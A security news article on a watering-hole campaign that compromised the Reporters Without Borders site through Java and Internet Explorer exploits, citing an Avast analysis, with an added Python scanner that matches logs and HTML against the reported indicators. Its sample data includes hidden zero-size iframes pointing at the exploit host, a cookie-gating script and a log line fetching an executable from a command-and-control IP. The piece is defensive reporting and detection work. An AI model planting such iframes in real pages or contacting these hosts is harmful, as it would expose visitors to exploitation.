The Java saga continued when unknown and apparently well-concealed goons exploited recent Java and Internet Explorer zero-days to compromise the website of the French-based, free-press advocacy group Reporters Without Borders. The attack, which attempted to take advantage of the time gulf that separates Oracle’s patch release from its users’ application of it, is part of a watering hole campaign also targeting Tibetan and Uyghur human rights groups as well as Hong Kong and Taiwanese political parties and other non-governmental organizations.
Writing on the Avast Security blog, Jindrich Kubec claims it is safe to assume that China is behind these attacks. Kubec’s assertion appears to be based, at least in part, on the reality that visitors to the watering hole sites (and the sites themselves, for that matter) are, for lack of a better way to put it, individuals, organizations, and political entities that the People’s Republic publicly does not like.
The watering hole attack is a social engineering technique whereby attackers attempt to compromise websites that are not directly or officially related to their intended targets but which they believe members of an intended target organization are likely to visit.
According to the Avast report, the attackers used the recent Internet Explorer and Java vulnerabilities, identified as CVE-2012-4792 and CVE-2013-0422 respectively. Microsoft resolved the IE bug with MS13-008 and Oracle fixed theirs with Java 7 update 11.
If the exploits succeed, they infect victim machines with either a remote access trojan that phones home to the Singapore-based “luckmevnc.myvnc.com” (IP address 112.140.186.252) or an injector that flashes a fake error page while downloading a similar remote access tool that communicates with the Hong Kong-based “d.wt.ikwb.com” (58.64.179.139).
An English version of the Reporters Without Borders site contained a suspicious JavaScript inclusion. That inclusion creates a cookie called “somethingbbbbb” designed to expire after one day. The same cookie was used in similar attacks a few years ago, and Kubec believes it could be related to the legitimate m.js cookie, “somethingeeee,” used by a Hong Kong political party.
Kubec also determined that an iframe from hxxp://newsite.acmetoy.com/m/d/pdf.html targeted users visiting the site in IE 8. There were an additional two iframes, hxxp://newsite.acmetoy.com/m/d/pdf.html and hxxp://newsite.acmetoy.com/m/d/javapdf.html, reserved for those who visited the site on a browser other than IE.
According to Kubec’s analysis, newsite.acmetoy.com hosted a number of files relating to the IE exploit listed above, including a DOITYOUR-obfuscated JavaScript file that attempts to exploit the latest Internet Explorer vulnerability, as well as DOITYOUR variants of “today.swf,” “news.html,” and “robots.txt.”
The site also attempted to exploit an older Java vulnerability from 2011 (CVE-2011-3544) and contained the related files: “javapdf.html,” a JavaScript file that serves both vulnerabilities; “AppletHigh.jar,” a CVE-2013-0422 exploit; and “AppletLow.jar,” a CVE-2011-3544 exploit.
In an analysis of another site (98.129.194.210), Kubec found that it contained the same malicious Java-related content and reasons that it probably serves as a backup to the first in the event of a takedown.
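For defenders who want to check their own proxy logs and cached page content against the indicators Avast published, here is a small added example (not code from the article or from Avast) that matches log lines and HTML against the domains, IP addresses, gating cookie name and exploit filenames named above. The log lines and HTML snippet embedded in it are constructed for illustration; only the indicator values themselves come from the report.

```python
import re
from dataclasses import dataclass

# Indicators of compromise as reported in the Avast write-up.
IOC_DOMAINS = {
    "luckmevnc.myvnc.com",   # RAT command-and-control (Singapore-based)
    "d.wt.ikwb.com",         # second RAT command-and-control (Hong Kong-based)
    "newsite.acmetoy.com",   # host serving the exploit iframes
}
IOC_IPS = {"112.140.186.252", "58.64.179.139", "98.129.194.210"}
IOC_COOKIE = "somethingbbbbb"   # one-day cookie set by the malicious inclusion
IOC_FILES = {"pdf.html", "javapdf.html", "AppletHigh.jar", "AppletLow.jar",
             "today.swf", "news.html"}


@dataclass
class Finding:
    source: str     # "proxy" or "html"
    indicator: str  # the matched value
    kind: str       # "domain", "ip", "cookie", "iframe" or "file"


_DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)
_IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# Captures the cookie name in  document.cookie = "name=value..."
_COOKIE_RE = re.compile(r"document\.cookie\s*=\s*[\"']([^=\"']+)=", re.I)
_IFRAME_RE = re.compile(r"<iframe[^>]+src\s*=\s*[\"']([^\"']+)[\"']", re.I)


def scan_proxy_line(line):
    """Return findings for one proxy/DNS log line: known C2 or exploit hosts and IPs."""
    findings = []
    for host in set(_DOMAIN_RE.findall(line)):
        if host.lower() in IOC_DOMAINS:
            findings.append(Finding("proxy", host.lower(), "domain"))
    for ip in set(_IP_RE.findall(line)):
        if ip in IOC_IPS:
            findings.append(Finding("proxy", ip, "ip"))
    return findings


def scan_html(html):
    """Return findings for fetched page content: the gating cookie and iframes
    that point at an indicator host or one of the named exploit files."""
    findings = []
    for name in _COOKIE_RE.findall(html):
        if name == IOC_COOKIE:
            findings.append(Finding("html", name, "cookie"))
    for src in _IFRAME_RE.findall(html):
        host = _DOMAIN_RE.search(src)
        if host and host.group(1).lower() in IOC_DOMAINS:
            findings.append(Finding("html", src, "iframe"))
        elif src.rsplit("/", 1)[-1] in IOC_FILES:
            findings.append(Finding("html", src, "file"))
    return findings


# Constructed sample data (not real captures): one host talks to both C2s,
# another only browses a benign site.
SAMPLE_PROXY_LOGS = [
    "2013-01-23T10:14:02Z 10.0.0.17 CONNECT luckmevnc.myvnc.com:443 200",
    "2013-01-23T10:14:05Z 10.0.0.17 GET http://d.wt.ikwb.com/ 200",
    "2013-01-23T10:15:11Z 10.0.0.42 GET http://www.example.com/index.html 200",
    "2013-01-23T10:16:30Z 10.0.0.17 GET http://58.64.179.139/update.exe 200",
]

SAMPLE_HTML = """
<script>
var d = new Date(); d.setTime(d.getTime() + 86400000);  /* expires in one day */
document.cookie = "somethingbbbbb=1; expires=" + d.toUTCString() + "; path=/";
</script>
<iframe src="http://newsite.acmetoy.com/m/d/pdf.html" width="0" height="0"></iframe>
<iframe src="http://newsite.acmetoy.com/m/d/javapdf.html" width="0" height="0"></iframe>
"""


def run_demo():
    """Scan the constructed samples and return a count of findings per source."""
    proxy = [f for line in SAMPLE_PROXY_LOGS for f in scan_proxy_line(line)]
    html = scan_html(SAMPLE_HTML)
    return {"proxy": len(proxy), "html": len(html)}


if __name__ == "__main__":
    for line in SAMPLE_PROXY_LOGS:
        for f in scan_proxy_line(line):
            print(f"{f.kind:7} {f.indicator}  <- {line}")
    for f in scan_html(SAMPLE_HTML):
        print(f"{f.kind:7} {f.indicator}")
```

The hostname match is exact rather than substring, so a benign domain that happens to contain one of these strings is not flagged; extend `IOC_DOMAINS` with the defanged hxxp hosts re-armed as plain hostnames if you are feeding it other reports in the same format.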
Avast said it notified Reporters Without Borders.